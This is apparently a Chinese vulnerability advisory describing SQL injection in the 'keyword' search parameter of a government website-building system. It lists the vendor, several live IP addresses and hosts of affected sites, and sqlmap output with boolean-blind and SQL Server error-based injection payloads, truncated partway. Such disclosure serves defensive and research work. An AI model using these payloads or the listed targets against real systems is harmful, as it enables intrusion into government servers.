某通用型政府建站系统SQL注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: RT ### 详细说明: 山东农友软件公司官网:http://www.nongyou.com.cn/ 案例如下: http://222.135.127.190:7000/gov/SearchInfoSum.aspx?keyword= http://221.2.171.59:8000/gov/SearchInfoSum.aspx?keyword= http://222.135.109.70:8100/gov/SearchInfoSum.aspx?keyword= http://61.133.119.187:8089/gov/SearchInfoSum.aspx?keyword= http://221.2.156.181:8100//gov/SearchInfoSum.aspx?keyword= http://221.2.149.47:8100/gov/SearchInfoSum.aspx?keyword= http://222.135.127.190:7000/gov/SearchInfoSum.aspx?keyword= ### 漏洞证明: 参数keyword存在注入 测试:http://huodong.whinfo.net.cn/gov/SearchInfoSum.aspx?keyword= ``` Place: GET Parameter: keyword Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: keyword=%' AND 3437=3437 AND '%'=' Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: keyword=%' AND 2049=CONVERT(INT,(CHAR(58) CHAR(113) CHAR(104) CHAR( 110) CHAR(58) (SELECT (CASE WHEN (2049=2049) THEN CHAR(49) ELSE CHAR(48) END)) C HAR(58) CHAR(106)...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息